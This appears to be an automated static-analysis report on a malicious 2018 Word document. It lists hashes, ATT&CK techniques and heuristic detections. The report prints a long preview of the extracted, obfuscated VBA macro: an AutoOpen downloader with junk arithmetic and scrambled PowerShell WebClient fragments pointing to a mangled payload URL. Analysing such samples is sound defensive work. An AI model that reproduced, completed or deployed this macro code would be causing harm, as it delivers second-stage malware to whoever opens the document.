Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6eaafe68a1564ce0…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 86.5 KB
Created: 2018-02-16 02:09:00
Authoring application: Microsoft Office Word
First seen: 2018-02-19
MD5: 9b9bf9297378c1a541dbba1b21952922
SHA-1: 54394c5a21c5ef352a70bf18527cdc32036e8e5b
SHA-256: 6eaafe68a1564ce0fd76696fe0bd4f2fbc2c2e1ba0836c4d47ec80976d78e8a5
Risk score: 182

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File

The sample contains a VBA macro with an AutoOpen function, which is a common technique for executing malicious code upon opening the document. The macro uses the Shell() function and constructs a URL, likely to download and execute a second-stage payload. The reconstructed URL is "http://tras1D+s1Dns-imperial.xkf+xkfru/Hys1D+s1DDS+yDSsERTl/?http://ww" and the reconstructed string for downloading is "System.Net.WebClient;gxkf+xkfcxkf+xkfBy'+'DSxkf+xkf+ys1D+s1DS+yDSadyDS+yDxkf+xkfSasyDS+yDSd.nextxkcIqn".

Heuristics (6)

  • VBA macros detected [medium] (3 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URLs:
      • http://tras1D+s1Dns-imperial.xkf+xkfru/Hys1D+s1DDS+yDSsERTl/?http://ww (in document text, OLE body)
      • http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 21227 bytes
SHA-256: 24e116295c2b9e128e48f169777e4b61d23e4f4c1ce5cb545b087804b5e3b338

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "kfpCZJoYITBt"
Function WXoIjfGARo()
On Error Resume Next
AdMni = 9825112 / CLng(ztpFb) - 6138061 * Cos(8254941) + bvoGW + 134518
ADJFtMQ = 7044642 / CLng(BSQDjqvsI) - 2439822 * Cos(2498828) + zwIYbR + 1549115
CPFXcRISH = 2575714 / CLng(iOLmAB) - 1173832 * Cos(1925595) + BMTnjAWvWJwzz + 2760301
wlPdAHLKMvP = (dCdBwzXMEJkTm) + HJjkJKD("dEzVILZifvXEaXfiMQqOS+xkf+xkfyDSsq +yDs1D+s'+'1DS+yDS gcBNSBxkf+xkf + (csq.excsxkf+xkfq+'+'yxkf+xkfDS+yDScsqeEGrLUzMmrr", 21, 89)
OuiaiUnz = 2245569 / CLng(oKPIB) - 6198698 * Cos(9169266) + PMkAsDvYTtOvTw + 5122651
LdcnWW = 2953456 / CLng(RdnUIOiCSuuNiO) - 9681272 * Cos(1806563) + IzjEMNnPWpAPh + 8541860
QuOKlliRUD = 6899302 / CLng(MkCIi) - 1173221 * Cos(9721960) + zaJBL + 7711214
rOKSOLIcd = (MTEFRiopiO) + HJjkJKD("zABcAAKzFfTNYDALncsq) Systs1D+s1Dem.Net.yDS+yDSWebClienyDS+yDSt;gxkf+xkfcxkf+xkfBy'+'DSxkf+xkf+ys1D+s1DDSNSBs1D+'+'s1D yDS+yDS= gys1D+s1DDS+yDxkf+x'+'kfScBnyDS+yDSsyDs1D+s1DS+yDSadyDS+yDxkf+xkfSasyDS+yDSd'+'.nextxkcIqn", 18, 197)
fXvVBzE = 398614 / CLng(jGmEl) - 747521 * Cos(6582632) + jdHEIT + 3993763
YGFAQDqLqnG = 6201381 / CLng(IYTZUKpIrwVB) - 3914799 * Cos(7228826) + mZzkSM + 2807446
wSbtu = 263475 / CLng(PwJcz) - 238151 * Cos(8702113) + zJsqibMwwvuFMH + 3004303
wNiQCP = (ZimkBKNSdvAP) + HJjkJKD("BvUIs1D+s1DS+yDSBSDs1D+s1Dxkf+xkfyD'+'S'+'+yDSCyDS+yDS =yDS+yDS gtEQKJGKGVuLBmYEdPZNJzGjVjpEsPpijX", 5, 61)
zPjAiMXtDTw = 659239 / CLng(noVQUwrHiSffSZ) - 2635745 * Cos(6782905) + wTTSqvjlDAp + 634823
XQGRIjqiJHL = 952933 / CLng(dOljwsKZbXBnih) - 6118790 * Cos(4640428) + JVbuAjfzsmf + 3171383
uZNtjWbOPwP = 9223503 / CLng(EdTBQ) - 6281912 * Cos(8508140) + qZZrwQCN + 410620
XojmUnYlaZM = (KqFXEKsT) + HJjkJKD("DlCaHPYkQFwyDS gcxkf+xkfyDS+xkf+xkfyDSBSDCyDSxkf+xkf+yDxkf+xkfS);&yDS+yDS'+'(csqInvocyDSGFtiNIOjP", 12, 77)
CSGCL = 2911375 / CLng(PrnsiBUInOu) - 6022859 * Cos(6899520) + kcWWzOXla + 1621253
JNYtji = 2692577 / CLng(uQMbTszWpofn) - 717317 * Cos(5394847) + UrqpYWFYDwa + 2011848
MXBopJPuu = 51497 / CLng(iQfitH) - 672298 * Cos(9394597) + vChNkww + 6872441
AnNQb = (iFjDGfIfVzK) + HJjkJKD("diZLdRFddoyDS+y'+'DScsq)yDS+yDs1D+s1DS;foreyDS+yDSachyDS+yDVptj", 11, 49)
CuLad = 6291811 / CLng(ivnqIVbHO) - 1510465 * Cos(7458732) + EkjMojSKo + 6891657
TEECc = 522342 / CLng(jzYYvaIC) - 9603969 * Cos(6066179) + ojwFTQB + 2792150
jUqVvTbP = 7110495 / CLng(cJaroUdCVjusSH) - 1709089 * Cos(9300895) + LnwjX + 4857442
IVFhEiIWDcz = (sIcshzNLXAJJU) + HJjkJKD("KXJrGKS,[CHaR]36-CREPLAce ([CHaR]83+[Cxkf+xkfHaR]87+s1D+s1D[Cs1D+s1DHaR]75),[s1D+s1xkf+xkfDCHaR]92'+' -RpdEPGubmfXrZItd", 7, 98)
fjEiA = 4024651 / CLng(NrwXNpamLEjFzH) - 5905548 * Cos(558092) + cwZat + 9943013
MGNhwwn = 3499005 / CLng(WDhTjvdzvSwibj) - 9514816 * Cos(8937571) + NDGshzbcwzz + 9159336
MvmhjlT = 4139118 / CLng(riZrltSb) - 1670100 * Cos(1290318) + EojYcv + 9790912
ZJnYZN = (HqwhHGfAbw) + HJjkJKD("ArfvRff+xkf(yDS+yDS10xkf+xkf000, 282133);yDS+yDIGrZrGDSkEZccPSjlMRdIoSV", 7, 41)
fqOIaL = 7414337 / CLng(LvDTDAQaov) - 3593405 * Cos(3736155) + hnbpM + 5616980
tDKoqdbjAC = 279358 / CLng(pZXbGndhtC) - 2174822 * Cos(3706180) + tKnTscn + 9891235
nPJZAOTuhst = 2076558 / CLng(himiNmw) - 6499294 * Cos(4399962) + wVVjswNnsutH + 29982
TRowwpSDq = (dEZzGABoLBNmuA) + HJjkJKD("HJFCcyDSxkf+x'+'kfsqys1D+s1DDS+yDS) ras1D+s1Dndom;gyDSs1'+'D+s1D+yDScByDS+yDSYYUyDS+yDS =yDS+yDS yDS+yDS.(csqnxkf+xkfes1D+s1Dcsqys1D+sJaTDmvwTYEdP", 6, 129)
ArdZzMzQvA = 7944707 / CLng(avPAGP) - 3523987 * Cos(5085401) + vplwbNWXTqH + 8113855
hBjOr = 9880600 / CLng(FXwwYSRiQn) - 6226457 * Cos(9021184) + lNYOvPKZS + 5916764
rlwqFINbMH = 9424150 / CLng(GSKshhRbT) - 1925798 * Cos(5641700) + RtHQQZ + 9609523
tiTqFTcu = (PvwUoiMX) + HJjkJKD("QFdGKsdVAcVsIC[chAR]115+[chAR]49+[chAR]68)'+',[StrING][chAR]39).rePLAcE(([chAR]118+[chAR]55+[chAR]57),[StrING]['
... (truncated)